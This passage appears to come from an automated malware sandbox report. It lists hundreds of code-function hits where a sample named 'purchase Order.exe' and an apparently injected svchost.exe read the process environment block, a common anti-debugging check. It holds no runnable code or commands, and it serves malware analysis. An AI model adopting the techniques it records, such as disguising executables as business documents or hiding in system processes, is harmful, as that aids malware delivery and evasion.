0_2_00C5E01E

Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_017CE348 mov eax, dword ptr fs:[00000030h]	0_2_017CE348
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_017CE2E8 mov eax, dword ptr fs:[00000030h]	0_2_017CE2E8
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_017CCCC8 mov eax, dword ptr fs:[00000030h]	0_2_017CCCC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]	2_2_037D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]	2_2_037FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]	2_2_0372C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]	2_2_03750310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]	2_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]	2_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]	2_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]	2_2_037663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]	2_2_037D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]	2_2_037D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]	2_2_037EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]	2_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]	2_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]	2_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]	2_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]	2_2_037B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]	2_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]	2_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]	2_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]	2_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]	2_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]	2_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]	2_2_0375438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]	2_2_0375438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]	2_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]	2_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]	2_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]	2_2_0372826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]	2_2_0372A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]	2_2_03736259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]	2_2_037B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]	2_2_037B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]	2_2_0372823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]	2_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]	2_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]	2_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]	2_2_037402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]	2_2_037402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]	2_2_0376E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]	2_2_0376E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]	2_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]	2_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]	2_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]	2_2_0372C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]	2_2_037C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]	2_2_03736154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]	2_2_03736154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]	2_2_03760124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]	2_2_038061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]	2_2_037F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]	2_2_037601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]	2_2_037F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]	2_2_037F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]	2_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]	2_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]	2_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]	2_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]	2_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]	2_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]	2_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]	2_2_03770185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]	2_2_037EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]	2_2_037EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]	2_2_037D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]	2_2_037D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]	2_2_0375C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]	2_2_03732050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]	2_2_037B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]	2_2_037C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]	2_2_0372A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]	2_2_0372C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]	2_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]	2_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]	2_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]	2_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]	2_2_037B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0372C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]	2_2_037720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0372A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]	2_2_037380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]	2_2_037B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]	2_2_037B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]	2_2_037F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_037F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]	2_2_037C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]	2_2_0373208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]	2_2_03738770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]	2_2_03730750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]	2_2_037BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]	2_2_03772750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]	2_2_03772750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]	2_2_037B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]	2_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]	2_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]	2_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]	2_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]	2_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]	2_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]	2_2_037AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]	2_2_0376C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]	2_2_0376C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]	2_2_03730710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]	2_2_03760710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]	2_2_0376C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]	2_2_037347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]	2_2_037347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]	2_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]	2_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]	2_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_037BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0373C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]	2_2_037B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]	2_2_037307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]	2_2_037D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]	2_2_03762674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]	2_2_037F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]	2_2_037F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]	2_2_0376A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]	2_2_0376A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]	2_2_0374C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]	2_2_0374E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]	2_2_03766620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]	2_2_03768620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]	2_2_0373262C
